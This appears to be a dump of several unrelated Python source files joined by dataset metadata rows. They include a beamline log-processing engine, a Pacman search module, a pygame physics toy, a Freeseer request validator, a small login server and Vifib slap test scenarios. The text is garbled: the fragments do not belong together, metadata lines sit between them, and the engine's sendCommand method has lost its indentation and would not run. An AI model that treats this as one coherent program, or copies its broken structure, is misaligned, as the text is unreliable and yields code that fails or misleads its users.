            char_value (string): String value of the PV, should be the full path to the image locations relative to epics
            **kw (dict): remaining values returned from epics
        """
        self.logger.info("User Change Event")
        #user = getUser(char_value)
        if (self.experimentFolderOn):
            # Path layout assumed: .../<user>/<experiment>/<images dir>, so the
            # user is the 3rd-from-last path element -- TODO confirm.
            print "Experiment folder on"
            experiment = getString(char_value, -2)
            user = getString(char_value, -3)
            print "EXPERIMENT : %s" % experiment
            print "USER : %s" % user
            # A user change implies an experiment change too.
            if (testStringChange(user, self.previousUser)):
                print "USER CHANGE, SO YES experiment CHANGE \nRUN user.change with experiment!"
                self.previousUser = user
                self.previousExperiment = experiment
                self.newUser1()
            else:
                print "NO USER CHANAGE"
                print "BETTER CHECK IF USER CHANGED!"
                # Same user: only the experiment sub-folder may have changed.
                if (testStringChange(experiment, self.previousExperiment)):
                    print "EXPERUIMENT CHANGE!"
                    self.previousExperiment = experiment
                    self.newExperiment()
                else:
                    print "Nothing changed, user nor experiment"
                    pass
        # Experiment folders are off: only compare against the user element.
        else:
            print "exerpimetn folder off, on;y check user"
            user = getString(char_value, -2)
            print "USER: %s" % user
            if testStringChange(user, self.previousUser):
                print "USER HAS CHANGED, run new user"
                self.previousUser = user
                self.newUser1()
            else:
                print "NO USER CHANGE DO NOTHING"
                pass
        # NOTE(review): the triple-quoted block below is dead code kept as a
        # no-op string literal (an earlier version of this logic).
        """
        else:
            user = getUser(char_value, -2)
            if (testUserChange(user, self.previousUser)):
                self.previousUser = user
                self.newUser(user)
            else:
                pass
        """
    def newExperiment(self):
        # TODO: stub -- experiment-change handling not implemented yet.
        print "function new experiment"
    def newUser1(self):
        # TODO: stub -- user-change handling not implemented yet.
        print "function new user"
    def newUser(self, user):
        """
        New User has been found: reset engine state, communicate the new
        details to all workers, create the user's database, and start
        watching the live logfile.

        Args:
            user (string): string value of the user

        NOTE(review): the current setUser() callback invokes the newUser1()
        stub, not this method -- confirm whether this path is still reachable.
        """
        self.logger.info("New User Requested")
        #Reset class variables for controlling logic and data
        self.first = True
        self.logLines = []
        self.needBuffer = True
        self.user = user
        self.liveLog = self.rootDirectory + "/" + self.user + "/images/livelogfile.log"
        self.datFileLocation = self.rootDirectory + "/" + self.user + "/raw_dat/"
        #Generate Directory Structure
        createFolderStructure(self.rootDirectory, self.user)
        self.logger.info("Directory Structure Created")
        #Update all workers
        self.sendCommand({"command":"update_user", "user":self.user})
        self.sendCommand({"command":"absolute_directory","absolute_directory":self.rootDirectory + "/" + self.user})
        self.createDB()
        #Start waiting for log to appear
        self.watchForLogLines(self.liveLog) # Start waiting for the Log
    def run(self):
        """
        Start the epics watcher for user changes, then block forever as the
        main thread so the epics callbacks can fire.
        """
        self.setUserWatcher() #Start epics call back
        while True:
            # Sleep-loop keeps the process alive; all work happens in callbacks.
            time.sleep(0.1)
    def lineCreated(self, line, **kw):
        """
        Parse a new logline, forward it to the database worker, and -- for
        sample types with a companion .dat file -- locate and process that file.

        Args:
            line (string): returned latest line from call back
            **kw (dictionary): any more remaining values
        """
        latestLine = LogLine.LogLine(line)
        self.logLines.append(latestLine)
        #Send off line to be written to db
        self.sendLogLine(latestLine)
        # Only SampleType "0" (buffer) and "1" (static sample) carry a .dat file.
        if (latestLine.getValue("SampleType") == "0" or latestLine.getValue("SampleType") == "1"):
            datFile = self.getDatFile(latestLine.getValue("ImageLocation"))
            if (datFile):
                self.processDat(latestLine, datFile)
        else:
            self.logger.info("Hey, it's a sample type I just don't care for!")
    def getDatFile(self, fullPath):
        """
        Locate the .dat file that matches an image path.

        Looks in self.datFileLocation for "<image basename>.dat", polling
        every 0.5 s and giving up after roughly 3 seconds.

        Args:
            fullPath (String): Absolute location of the image from the LogLine

        Returns:
            | DatFile object created from the matching file,
            | or False if nothing is found within the timeout
        """
        imageName = os.path.basename(fullPath)
        imageName = os.path.splitext(imageName)[0]
        datFileName = imageName + ".dat"
        time.sleep(0.1) #have a little snooze to make sure the image has been written
        self.logger.info("Looking for DatFile %s" % datFileName)
        startTime = time.time()
        while not os.path.isfile(self.datFileLocation + datFileName):
            self.logger.info("Waiting for the %s" % datFileName)
            time.sleep(0.5)
            # Give up after ~3 s so a missing file never stalls the engine.
            if (time.time() - startTime > 3.0):
                self.logger.critical("DatFile: %s - could not be found - SKIPPING" % datFileName)
                return False
        datFile = DatFile.DatFile(self.datFileLocation + datFileName)
        self.logger.info("DatFile: %s - has been found" % datFileName)
        return datFile
    def processDat(self, logLine, datFile):
        """
        | Here we will decide how to process the datFile
        | Sample Types:
        |    6 - Water
        |    0 - Buffer
        |    1 - Static Sample
        | Sample type of DatFile is determined by the logline. We only currently care for 0 (buffer), or 1 (static Sample)
        | If sample is a buffer, it is passed to WorkerBufferAverage to be processed
        | If it is a sample it is passed to all workers to be processed by them if they want

        We check if the Workers need an AveragedBuffer which we then can request from WorkerBufferAverage
        We check for a rootname change indicating a new sample which may or may not require a new buffer average

        Args:
            logLine (LogLine Object): Latest Logline
            datFile (datFile Object): Corresponding DatFile from LogLine

        Raises:
            IndexError: Raised only on first pass, as we need the previous logline to compare against
        """
        try:
            # Compare the basenames of the two most recent images; a change in
            # root name marks the start of a new sample series.
            if (changeInRootName(os.path.basename(self.logLines[-1].getValue("ImageLocation")), os.path.basename(self.logLines[-2].getValue("ImageLocation")))):
                self.logger.info("There has been a change in the root name")
                self.sendCommand({"command":"root_name_change"})
                if (logLine.getValue("SampleType") == "0"):
                    self.logger.info("New Buffer!")
                    self.needBuffer = True
                    self.sendCommand({"command":"new_buffer"})
                    self.sendCommand({"command":"buffer", "buffer":datFile})
                if (logLine.getValue("SampleType") == "1"):
                    if (self.needBuffer):
                        # Fetch the averaged buffer before forwarding the sample.
                        averagedBuffer = self.requestAveragedBuffer()
                        print "AVERAGED BUFFER"
                        print averagedBuffer
                        if (averagedBuffer):
                            self.sendCommand({"command":"averaged_buffer", "averaged_buffer":averagedBuffer})
                            self.needBuffer = False
                            self.sendCommand({"command":"static_image", "static_image":datFile})
                        else:
                            # NOTE(review): sample is forwarded even without an
                            # averaged buffer here, unlike the branch below which
                            # logs a critical error -- confirm which is intended.
                            self.sendCommand({"command":"static_image", "static_image":datFile})
                    else:
                        self.logger.info("So lets average with current buffer!")
            else:
                self.logger.info("No change in root name fellas")
                if (logLine.getValue("SampleType") == "0"):
                    self.sendCommand({"command":"buffer", "buffer":datFile})
                if (logLine.getValue("SampleType") == "1"):
                    if (self.needBuffer):
                        averagedBuffer = self.requestAveragedBuffer()
                        print averagedBuffer
                        if (averagedBuffer):
                            self.sendCommand({"command":"averaged_buffer", "averaged_buffer":averagedBuffer})
                            self.needBuffer = False
                            self.sendCommand({"command":"static_image", "static_image":datFile})
                        else:
                            self.logger.critical("No averaged Buffer returned unable to perform subtraction")
                    else:
                        self.sendCommand({"command":"static_image", "static_image":datFile})
        except IndexError:
            # self.logLines has fewer than two entries -- expected on first pass only.
            if (self.first):
                self.first = False
            else:
                self.logger.info("INDEX ERROR - Should only occur on first pass!")
    def cli(self):
        """
        Minimal interactive debug console (blocking); exits on Ctrl-C.
        """
        try:
            while True:
                print "exit - to exit"
                print "workers - sends test command out to find workers that are alive"
                print "variables - returns all the class variables of each worker"
                request = raw_input(">> ")
                if (request == "exit"):
                    self.exit()
                if (request == "workers"):
                    self.test()
                if (request == "variables"):
                    self.sendCommand({"command":"get_variables"})
                    time.sleep(0.1)
        except KeyboardInterrupt:
            pass
#Generic Methods
def sendCommand(self, command):
"""
Sends a structed Dictionary command to all connected Workers
Args:
command (Dictionary): requested command to be sent
"""
if (type(command) is dict):
for worker in self.connectedWorkers:
self.connectedWorkers[worker].send_pyobj(command)
else:
self.logger.critical("Incorrect Command datatype, must send a dictionary")
    def sendLogLine(self, line):
        """
        Forward a LogLine to the WorkerDB to be written out to the database.

        Args:
            line (LogLine object): LogLine object that you want to write to the DB
        """
        self.connectedWorkers['WorkerDB'].send_pyobj({"command":"log_line", "line":line})
    def createDB(self):
        """
        Ask the WorkerDB to create the database for the current user.
        """
        self.connectedWorkers['WorkerDB'].send_pyobj({"command":"createDB"})
    def requestAveragedBuffer(self):
        """
        Request the current averaged buffer from WorkerBufferAverage.

        Returns:
            Averaged Buffer List

        NOTE(review): recv_pyobj() blocks with no timeout -- a dead worker
        would hang the engine here; confirm this is acceptable.
        """
        self.requestBuffer.send("request_buffer")
        buffer = self.requestBuffer.recv_pyobj()  # `buffer` shadows a builtin
        return buffer
    def test(self):
        # Debug helper: ping all workers, then pause to let replies arrive.
        self.sendCommand({'command':"test"})
        time.sleep(0.1)
    def exit(self):
        """
        Properly shuts down all the workers, then terminates this process.
        """
        self.sendCommand({"command":"shut_down"})
        time.sleep(0.1)  # give the shutdown command time to be delivered
        sys.exit()
    def setLoggingDetails(self):
        """
        Configure logging for this engine via the python logging module:
        writes to logs/<name>.log and mirrors all records (DEBUG and up)
        to the console through a StreamHandler.
        """
        LOG_FILENAME = 'logs/'+self.name+'.log'
        FORMAT = "%(asctime)s - %(levelname)s - %(name)s - %(message)s"
        logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG,format=FORMAT)
        console = logging.StreamHandler()
        console.setLevel(logging.DEBUG)
        formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(name)s - %(message)s')
        console.setFormatter(formatter)
        logging.getLogger(self.name).addHandler(console)
        self.logger = logging.getLogger(self.name)
        self.logger.info("\nLOGGING STARTED")
# Script entry point: build an Engine from the config file and block in run().
if __name__ == "__main__":
    eng = Engine("settings.conf")
    eng.run()
|
UTF-8
|
Python
| false | false | 2,012 |
14,061,722,960,705 |
1f57d801e1dc4b581fe0d9c8a3085a6a4b133bab
|
c647d3681fb3035409935882027e87899c072826
|
/src/carmcmc/__init__.py
|
9830e70fa28156beaf5d563ce2b8dc6e94efaacb
|
[
"MIT"
] |
permissive
|
anetasie/carma_pack
|
https://github.com/anetasie/carma_pack
|
c2a1a188707200a5efd7b2e23514f8cb063d9866
|
7fae9e69844faee9a719e3d95f301ee88d239b9c
|
refs/heads/master
| 2021-01-18T07:48:52.085678 | 2013-09-17T02:07:47 | 2013-09-17T02:07:47 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from _carmcmc import *
from carma_pack import CarmaMCMC, CarmaSample, CarSample1, power_spectrum, carma_variance, \
carma_process, get_ar_roots
from samplers import MCMCSample
|
UTF-8
|
Python
| false | false | 2,013 |
2,791,728,790,208 |
3edfc9b40298e36b56154d4a49bd6c538a672e35
|
aedc91275999871b157191f4fad92ebe85debdb9
|
/heuristica_complex/trabalho1/ex_25.py
|
cabcf84ac2f7c9f74f1dd923f7bb4f54284feebf
|
[] |
no_license
|
hugomaiavieira/trabalhos_uenf
|
https://github.com/hugomaiavieira/trabalhos_uenf
|
0f419b773fc84710eba55d5242a0803b604abb6c
|
1af4c1bea374cf5da7412f99cb1e517bd59fde7d
|
refs/heads/master
| 2020-05-20T10:58:39.801734 | 2011-05-23T20:54:18 | 2011-05-23T20:54:21 | 605,749 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def horner_bitwise(lista, k):
    """Evaluate sum(lista[i] * 2**(k*i)) using only addition and bit shifts.

    Multiplication is performed by the repeated-addition helper
    ``multiplicar`` and powers of two by the shift helper ``dois_elevado_a``
    (exercise constraint: no ``*`` / ``**`` operators).
    """
    resultado = 0
    # enumerate() replaces the index-based range(len(...)) loop.
    for i, coeficiente in enumerate(lista):
        ki = multiplicar(k, i)
        resultado += multiplicar(dois_elevado_a(ki), coeficiente)
    return resultado
def multiplicar(num1, num2):
    """Multiply two integers using only repeated addition (no ``*``).

    Generalized to handle negative operands correctly (the sign of the
    product follows the usual sign rule); behavior for non-negative inputs
    is unchanged: the larger magnitude is added `smaller` times.
    """
    # Product is negative exactly when the operand signs differ.
    negativo = (num1 < 0) != (num2 < 0)
    abs1 = num1 if num1 >= 0 else -num1
    abs2 = num2 if num2 >= 0 else -num2
    # Add the larger magnitude the smaller number of times.
    maior, menor = (abs1, abs2) if abs1 >= abs2 else (abs2, abs1)
    resultado = 0
    for _ in range(menor):
        resultado += maior
    return -resultado if negativo else resultado
def dois_elevado_a(n):
    """Return 2**n computed with a left shift (n must be a non-negative int)."""
    potencia = 1 << n
    return potencia
|
UTF-8
|
Python
| false | false | 2,011 |
18,949,395,721,578 |
53d18d027751e3ef650aa929b6a1b7f94f5b9610
|
342fff5dfbf09521d64e69a0720590585b400d0e
|
/AoC/Faolan/trunk/tools/pyAoCServ/src/UniverseServer.py
|
898b8ec1775b45604bfdc34a239f58f7c5763561
|
[
"GPL-2.0-only"
] |
non_permissive
|
vipuldivyanshu92/Projects
|
https://github.com/vipuldivyanshu92/Projects
|
071d4223b96f310042475afce0ada0c5f4885996
|
b39abbee89405e466534191c422a2e01bb220012
|
refs/heads/master
| 2021-01-10T01:26:10.036872 | 2011-07-02T10:42:17 | 2011-07-02T10:42:17 | 8,507,984 | 2 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from common import framework
from universe import onInitiateAuthentification, onAnswerChallenge
import asyncore
import MySQLdb
class UniverseServer(framework.server):
    """Universe login server: listens on TCP port 7000 and dispatches
    UniverseAgent packets (opcodes 0 and 1) to their handlers."""
    def __init__(self):
        framework.server.__init__(self, 7000, 20, framework.GlobalHandler, False)
        # NOTE(review): MySQLdb.connection is the low-level _mysql class; the
        # usual high-level factory is MySQLdb.connect -- confirm this is intended.
        self.db = MySQLdb.connection(
            host = "127.0.0.1",
            user = "root",
            passwd = "",
            db = "aoc",
        )
        # Packet dispatch table: agent name -> {opcode: handler callable}.
        self.packetMgr = {
            "UniverseAgent" : {
                0 : onInitiateAuthentification.onInitiateAuthentification,
                1 : onAnswerChallenge.onAnswerChallenge,
            }
        }
# Instantiate the server (binds via framework.server) and enter the
# asyncore event loop; this call blocks for the life of the process.
serv = UniverseServer()
asyncore.loop()
|
UTF-8
|
Python
| false | false | 2,011 |
16,286,515,991,567 |
99dbf5b998d1b18b1cf581babc5de34b3ab9bcb0
|
802a0d67741397ac1bef4965caff402e23bbf879
|
/src/freeseer/frontend/controller/validate.py
|
3a6e0c72299357159a98928c458f2a6b4b853096
|
[
"GPL-3.0-only"
] |
non_permissive
|
benbuckley/freeseer
|
https://github.com/benbuckley/freeseer
|
16aa6a6e02987dc77e4e58b07eff5d339ce60f43
|
2a74681b45186244f1a6bc3df730346b9e4f05a5
|
refs/heads/master
| 2021-01-18T08:25:42.855410 | 2014-11-25T03:51:40 | 2014-11-25T04:02:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# freeseer - vga/presentation capture software
#
# Copyright (C) 2014 Free and Open Source Software Learning Centre
# http://fosslc.org
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# For support, questions, suggestions or any other inquiries, visit:
# http://wiki.github.com/Freeseer/freeseer/
from jsonschema import validate
from jsonschema import ValidationError
def validate_control_recording_request_form(to_validate):
    """Return True iff *to_validate* is an object whose required "command"
    key is one of "start", "pause" or "stop" (per the JSON schema below)."""
    schema = {
        "type": "object",
        "properties": {
            "command": {
                "enum": ["start", "pause", "stop"]
            }
        },
        "required": ["command"]
    }
    try:
        validate(to_validate, schema)
    except ValidationError:
        return False
    return True
def validate_create_recording_request_form(to_validate):
    """Return True iff *to_validate* has a required non-empty "filename"
    string consisting only of word characters (per the JSON schema below)."""
    schema = {
        "type": "object",
        "properties": {
            "filename": {
                "type": "string",
                "pattern": "^\w+$"
            }
        },
        "required": ["filename"]
    }
    try:
        validate(to_validate, schema)
    except ValidationError:
        return False
    # Belt-and-braces: reject the empty string explicitly (the pattern
    # above already requires at least one character).
    return to_validate["filename"] != ""
|
UTF-8
|
Python
| false | false | 2,014 |
309,237,692,698 |
14827b1cfd92d9a91b16e99952c56417e8bd0b0a
|
3df34ab0111112abcc10ae244079874c9b5b47d7
|
/darking.py
|
89ec7b677319a5bd3ab8941ea49fb729c780e061
|
[] |
no_license
|
antiface/Harvest
|
https://github.com/antiface/Harvest
|
878210c0badabc06dcc7091fa479db936eded178
|
a6994555be0805a6fa8e68d49b19793ab25fdf21
|
refs/heads/master
| 2020-12-28T19:07:51.896469 | 2014-04-22T21:48:18 | 2014-04-22T21:48:18 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import pygame,random, physics, harvest_screen, math
from harvest_screen import *
class blobPoint(object):
    """A 1x1-pixel physics particle: position/velocity vectors, wall
    bouncing, damping and gravity, drawn as a black pixel sprite."""
    def __init__(self,x,y):
        # add itself to the Things-with-mass list?
        #get black pixel image and its 1x1 rectangle
        self.image = pygame.image.load("images/blackPixel.bmp")
        self.rect = self.image.get_rect().inflate(3,3)
        self.position = physics.vector2d(x,y)
        self.velocity = physics.vector2d(0,0) #x,y velocities (pixels per tick)
        #self.acceleration = physics.vector2d(0,0) # x,y accelerations
        self.temperature = 20 # maybe irrelevant? maybe super important?
        self.controlpt = False
    def bump(self,ptList):
        # Swap damped velocities with the first point this rect collides with.
        # NOTE(review): collidelist() returns -1 when nothing collides, which
        # would silently bump ptList[-1] -- confirm callers guarantee a hit.
        i = self.rect.collidelist(ptList)
        ptList[i].velocity,self.velocity = self.velocity.multiply(.6),ptList[i].velocity.multiply(.6)
    def accelerate(self):
        # In this world there are very few forces: here we check and apply them all to this blobPoint
        # accelerate for particle attraction
        physics.applyForce(self,physics.Gravity)
        # accelerate for solid?/liquid/air resistance
        #if not self.controlpt:
        #    dragVect = self.velocity.multiply(-.2)
        self.velocity = self.velocity.multiply(.95)
        # NOTE(review): this compares the *sum* of components, not the speed
        # magnitude -- possibly intended sqrt(x**2 + y**2); confirm.
        if self.velocity.x + self.velocity.y > 150:
            self.velocity = physics.vector2d(10,10)
        #accelerate for other forces?
    def update(self):
        # Clamp the particle just inside each screen edge and bounce.
        if self.position.x > width:
            self.position.x = width -1
            self.velocity = self.velocity.reverse()
        if self.position.x < 0:
            self.position.x = 1
            self.velocity = self.velocity.reverse()
        if self.position.y > height:
            self.position.y = height-1
            self.velocity = self.velocity.reverse()
        if self.position.y < 0:
            self.position.y = 1
            self.velocity = self.velocity.reverse()
        self.velocity = self.velocity.multiply(.65)
        self.position = self.position.add(self.velocity)
        self.accelerate()
    def blit(self):
        # Draw the pixel sprite centred on the current position.
        self.rect.center = self.position.coords
        screen.blit(self.image,self.rect)
class controlPoint(blobPoint):
    """A blobPoint that attracts a set of satellite points (self.parts),
    overriding accelerate() with distance-based attraction/repulsion."""
    def __init__(self,x,y):
        blobPoint.__init__(self,x,y)
        #DO THIS GODDAM THING!!!!
    def accelerate(self):
        # NOTE(review): self.parts is never assigned in this class or in
        # blobPoint -- presumably the owner attaches the satellite points
        # after construction; confirm.
        for point in self.parts:
            dist = math.sqrt(math.pow(self.position.x-point.position.x,2)+math.pow(self.position.y-point.position.y,2))
            # Unit vector from the satellite towards this control point,
            # scaled so attraction falls off with distance^1.5.
            vect = physics.vector2d(self.position.x-point.position.x,self.position.y-point.position.y).unitize()
            vect = vect.multiply(350)
            vect = vect.divide(math.pow(dist,1.5))
            physics.applyForce(point,vect)
            if self.rect.colliderect(point.rect):
                self.velocity = physics.vector2d(0,0)
                point.velocity = physics.vector2d(0,0)
            if dist <= 50 and point.controlpt:
                #point.velocity = point.velocity.reverse()
                point.velocity = physics.vector2d(0,0)
                vect = vect.reverse()
                #physics.applyForce(point,vect)
            if dist <= 50 and not point.controlpt:
                point.velocity = point.velocity.multiply(.5)
            if dist >= 200 and not point.controlpt:
                # Teleport a stray satellite to a random offset near the
                # control point (biased towards small offsets by re-rolling).
                a = random.randint(-70,70)
                b = random.randint(-70,70)
                if abs(a) > 30:
                    a = random.randint(-70,70)
                if abs(b) > 30:
                    b = random.randint(-70,70)
                point.position = self.position.add(physics.vector2d(a,b))
        # accelerate for gravity
|
UTF-8
|
Python
| false | false | 2,014 |
14,431,090,154,004 |
f2c2c14654450ef13db403c9b8121b503ca9096b
|
92b937cbc0b224852f3f31e99e2ff3f27b8f1fe7
|
/search.py
|
fb9bc630848d1dce2c6c82db85dfcc551765a267
|
[] |
no_license
|
yoavkt/AI_ex1
|
https://github.com/yoavkt/AI_ex1
|
fbf6a1875886b62a82b1dac9fb4e935e68b92e67
|
5de1aeb186cc127f4b7d2d774cf4c14015886679
|
refs/heads/master
| 2020-06-04T10:53:30.401260 | 2013-11-02T13:34:30 | 2013-11-02T13:34:30 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# search.py
# ---------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero ([email protected]) and Dan Klein ([email protected]).
# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html
"""
In search.py, you will implement generic search algorithms which are called
by Pacman agents (in searchAgents.py).
"""
import util
from game import Directions
class SearchProblem:
  """
  This class outlines the structure of a search problem, but doesn't implement
  any of the methods (in object-oriented terminology: an abstract class).

  You do not need to change anything in this class, ever.
  """

  def getStartState(self):
     """
     Returns the start state for the search problem
     """
     util.raiseNotDefined()

  def isGoalState(self, state):
     """
       state: Search state

     Returns True if and only if the state is a valid goal state
     """
     util.raiseNotDefined()

  def getSuccessors(self, state):
     """
       state: Search state

     For a given state, this should return a list of triples,
     (successor, action, stepCost), where 'successor' is a
     successor to the current state, 'action' is the action
     required to get there, and 'stepCost' is the incremental
     cost of expanding to that successor
     """
     util.raiseNotDefined()

  def getCostOfActions(self, actions):
     """
      actions: A list of actions to take

     This method returns the total cost of a particular sequence of actions.  The sequence must
     be composed of legal moves
     """
     util.raiseNotDefined()
def tinyMazeSearch(problem):
  """
  Hard-coded solution for the tinyMaze layout only; the move sequence is
  wrong for every other maze, so never use this elsewhere.
  """
  from game import Directions
  south = Directions.SOUTH
  west = Directions.WEST
  plan = [south, south, west, south, west, west, south, west]
  return plan
def FirstSearchHelper(problem, fringe):
    """
    Generic graph-search helper shared by BFS and DFS.

    Args:
        problem: a SearchProblem instance
        fringe: util.Stack (DFS) or util.Queue (BFS)

    Returns:
        list of actions from the start state to a goal, or None if no goal
        is reachable
    """
    # nodes in fringe will be (state, parent, direction)
    # closed: dictionary {state: node tuple}
    # path: list of util.Directions
    closed = {}
    path = []
    root = problem.getStartState()
    fringe.push((root, None, Directions.STOP))
    while not fringe.isEmpty():
        node = fringe.pop()
        state = node[0]
        if problem.isGoalState(state):
            # Walk parent links back to the root, collecting directions.
            while node[2] != Directions.STOP:
                path.append(node[2])
                node = closed[node[1]]  # Get parent node
            path.reverse()
            return path
        if state not in closed:
            closed[state] = node
            children = problem.getSuccessors(state)
            for child in children:
                # `in` replaces the deprecated dict.has_key() (removed in
                # Python 3) and matches the membership test used above.
                if child[0] not in closed:
                    fringe.push((child[0], state, child[1]))
    return None
def depthFirstSearch(problem):
    """Depth-first graph search: LIFO fringe (util.Stack) explores deepest first."""
    fringe = util.Stack()
    return FirstSearchHelper(problem, fringe)
def breadthFirstSearch(problem):
    """Breadth-first graph search: FIFO fringe (util.Queue) explores shallowest first."""
    fringe = util.Queue()
    return FirstSearchHelper(problem, fringe)
def uniformCostSearch(problem):
    """
    Uniform-cost graph search.

    Delegates to aStarSearch with its default null heuristic: A* with
    h(n) == 0 expands nodes purely in order of path cost g(n), which is
    exactly uniform-cost search.
    """
    return aStarSearch(problem)
def nullHeuristic(state, problem=None):
  """
  A heuristic function estimates the cost from the current state to the nearest
  goal in the provided SearchProblem.  This trivial heuristic always returns 0,
  which makes aStarSearch behave exactly like uniform-cost search.
  """
  return 0
def aStarSearch(problem, heuristic=nullHeuristic):
    """
    A* graph search with priority f(n) = g(n) + h(n).

    Args:
        problem: a SearchProblem instance
        heuristic: callable (state, problem) -> estimated cost to the goal

    Returns:
        list of actions from the start state to a goal, or None if no goal
        is reachable
    """
    # Almost identical to FirstSearchHelper but making this really generic
    # would have made the code really cumbersome
    #
    # fringe: util.PriorityQueue() with priority f(n)=g(n)+h(n)
    # nodes in fringe will be (state, parent, direction)
    # closed: dictionary {state: node tuple}
    # path: list of util.Directions
    # c, h, f: per-state cost dictionaries (f = c + h)
    closed = {}
    fringe = util.PriorityQueue()
    path = []
    c = {}
    h = {}
    f = {}
    root = problem.getStartState()
    c[root] = 0
    h[root] = heuristic(root, problem)
    f[root] = c[root] + h[root]
    fringe.push((root, None, 'Stop'), f[root])
    while not fringe.isEmpty():
        node = fringe.pop()
        state = node[0]
        if problem.isGoalState(state):
            # Reconstruct the path by following parent links back to the root.
            while node[2] != 'Stop':
                path.append(node[2])
                node = closed[node[1]]
            path.reverse()
            return path
        closed[state] = node
        children = problem.getSuccessors(state)
        for child in children:
            if child[0] not in closed:
                c_child = c[state] + child[2]
                # Cache heuristic values per state; `in` replaces the
                # deprecated dict.has_key() (removed in Python 3).
                if child[0] not in h:
                    h[child[0]] = heuristic(child[0], problem)
                if (child[0] not in c) or (c_child < c[child[0]]):
                    # node never checked or current path is better
                    c[child[0]] = c_child
                    f[child[0]] = c[child[0]] + h[child[0]]
                    fringe.push((child[0], state, child[1]), f[child[0]])
    return None
# Abbreviations
# Short aliases expected by the pacman command-line interface (-f option).
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
|
UTF-8
|
Python
| false | false | 2,013 |
17,480,516,903,731 |
4aa9f40e03eda62bd8108f7a5554d7e263117f9a
|
c7376d7bdf93ded430a9095ae2a10c92a400db95
|
/master/product/Vifib/tests/testVifibSlapSoftwareReleaseAvailable.py
|
bab27d12814f77f327135cac8b7317eea460f5c4
|
[] |
no_license
|
shadowchmod/slapos.core
|
https://github.com/shadowchmod/slapos.core
|
7fc550a9d443f8e9603ef61bfa59f7d52a10317f
|
947508d45aa371590bee20625ebdd6af6b9f17f5
|
refs/heads/master
| 2021-01-21T01:05:45.317738 | 2012-08-17T15:26:28 | 2012-08-17T15:26:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from Products.ERP5Type.tests.Sequence import SequenceList
import unittest
from testVifibSlapWebService import TestVifibSlapWebServiceMixin
class TestVifibSlapSoftwareReleaseAvailable(TestVifibSlapWebServiceMixin):
  """Scenario tests for the SoftwareRelease.available slap call.

  Each test builds a whitespace-separated step-sequence string, feeds it to
  a SequenceList and plays it against this test case; the individual steps
  (Login*, Check*, Tic, Slap*, ...) are provided by the inherited mixin.
  """
  ########################################
  # SoftwareRelease.available
  ########################################
  def test_SoftwareRelease_available_afterRegister(self):
    """
    Check that calling SoftwareRelease.available after just registration raises a
    NotFoundError
    """
    sequence_list = SequenceList()
    sequence_string = self.prepare_formated_computer + '\
      SlapLoginCurrentComputer \
      SelectNewSoftwareReleaseUri \
        CheckNotFoundSoftwareReleaseAvailableAfterRegisterCall \
      SlapLogout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
  def test_SoftwareRelease_available_SetupResource_ConfirmedState(self):
    """
    Check that calling SoftwareRelease.available works in
    confirmed state with the setup resource
    """
    sequence_list = SequenceList()
    sequence_string = self.prepare_software_release_purchase_packing_list + '\
      SlapLoginCurrentComputer \
      CheckSuccessSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginDefaultUser \
      CheckStoppedPurchasePackingList \
      CheckSoftwareReleaseAvailableForRequest \
      Logout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
  def test_Computer_available_SetupResource_ConfirmedState_CleanupResource_ConfirmedState(self):
    sequence_list = SequenceList()
    sequence_string = self.prepare_software_release_purchase_packing_list + '\
      LoginDefaultUser \
      SetCurrentPurchasePackingListAsA \
      Logout \
      SlapLoginCurrentComputer \
      CheckSuccessComputerGetSoftwareReleaseListCall \
      SlapLogout ' + self.prepare_software_release_cleanup_confirmed_packing_list + '\
      LoginDefaultUser \
      SetCurrentPurchasePackingListAsB \
      Logout \
      SlapLoginCurrentComputer \
      CheckSuccessComputerGetSoftwareReleaseListCall \
      CheckDestroyedStateGetSoftwareReleaseListCall \
      CheckSuccessSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginDefaultUser \
      CheckSoftwareReleaseAvailableForRequest \
      CheckStoppedPurchasePackingListA \
      CheckConfirmedPurchasePackingListB \
      Logout \
      SlapLoginCurrentComputer \
      CheckSuccessComputerGetSoftwareReleaseListCall \
      CheckDestroyedStateGetSoftwareReleaseListCall \
      CheckSuccessSoftwareReleaseDestroyedCall \
      Tic \
      SlapLogout \
      LoginDefaultUser \
      CheckDeliveredPurchasePackingListA \
      CheckDeliveredPurchasePackingListB \
      CheckSoftwareReleaseUnavailableForRequest \
      Logout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
  def test_SoftwareRelease_available_CleanupResource_ConfirmedState(self):
    sequence_list = SequenceList()
    sequence_string = self.prepare_software_release_cleanup_purchase_packing_list + '\
      SlapLoginCurrentComputer \
      CheckNotFoundSoftwareReleaseAvailableCall \
      Tic \
      SlapLogout \
      LoginERP5TypeTestCase \
      CheckSiteConsistency \
      Logout \
      '
    sequence_list.addSequenceString(sequence_string)
    sequence_list.play(self)
